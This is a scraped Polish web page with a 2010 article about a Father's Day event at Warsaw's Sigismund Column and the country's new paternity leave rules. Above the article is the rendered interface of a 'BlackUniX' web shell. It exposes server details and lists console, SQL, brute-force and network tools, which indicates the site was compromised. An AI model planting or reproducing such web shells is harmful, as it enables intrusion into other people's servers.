W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-21 08:00:55
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.80.7.173
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Zapraszamy do wspólnego świętowania Dnia Ojca
22.06.2010.
23 czerwca Elżbieta Radziszewska Pełnomocnik Rządu do spraw Równego Traktowania oraz Hanna Gronkiewicz – Waltz Prezydent Miasta Stołecznego Warszawy zapraszają do wspólnego świętowania Dnia Ojca w godz. 16.00 – 18.00 pod Kolumną Zygmunta w Warszawie. Happeningowi dla rodziców z dziećmi towarzyszyć będą wywiady ze znanymi ojcami, m.in.  Tomaszem Karolakiem, Pawłem Królikowskim i Olivierem Janiakiem oraz rozdawanie materiałów informacyjnych dot. m.in. nowo wprowadzonych do polskiego prawa urlopów ojcowskich.
 
 
Punktem kulminacyjnym spotkania pod Kolumną Zygmunta 23 czerwca będzie wspólne zdjęcie uczestników wydarzenia (obdarowanych balonami) ustawionych tak, aby utworzyli napis TATA. O godz. 17.00 wszystkie balony zostaną wypuszczone w niebo. Kontynuacją wydarzenia będzie konkurs fotograficzny na najlepsze zdjęcie na temat „Tata w pracy - Tata w domu”, ogłoszony przez Pełnomocnika Rządu do spraw Równego Traktowania w czasie happeningu.

Aktywne ojcostwo – codzienne uczestnictwo w wychowaniu dziecka, jego życiu, problemach i radościach, to nie tylko szczęśliwsze rodziny, ale także większe sukcesy w pracy. Jak pokazują badania, opieka nad dzieckiem pozwala w wyjątkowym stopniu rozwinąć tzw. miękkie umiejętności menedżerskie, m.in. umiejętności komunikacyjne i umiejętności z zakresu zarządzania czasem. Promowanie aktywnego ojcostwa i partnerskiego modelu rodziny jest także kluczowe dla długofalowej skuteczności rozwiązań na rzecz godzenia obowiązków zawodowych z rodzinnymi i wyrównania szans kobiet i mężczyzn na rynku pracy. W Szwecji średnio 19,5 % urlopów rodzicielskich wykorzystują ojcowie. W Polsce ojcowie praktycznie nie korzystali dotychczas z urlopów wychowawczych. Od stycznia 2010 w Polsce weszły w życie tzw. urlopy ojcowskie, które mają zachęcić do partnerskiego rodzicielstwa i aktywnego włączenia się ojców w opiekę nad dziećmi. Od 1 stycznia 2010 r. ojcowie zatrudnieni na umowę o pracę mają prawo do urlopu ojcowskiego w wymiarze 1 tygodnia, a od 2012 r. – 2 tygodni. W materiałach informacyjnych dla ojców, które będą rozdawane 23 czerwca pod Kolumną Zygmunta, przypominamy także ojcom o możliwości korzystania przez nich m.in. z urlopu wychowawczego, części podstawowego urlopu macierzyńskiego i tzw. dodatkowego urlopu macierzyńskiego oraz 60 dni wolnych od pracy z powodu konieczności osobistego sprawowania opieki nad chorym dzieckiem.

 

Wiecej informacji i elektroniczna wersja ulotki dot. urlopów dla ojców w zakresie opieki nad dzieckiem: www.rownetraktowanie.gov.pl
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


21.07.2018.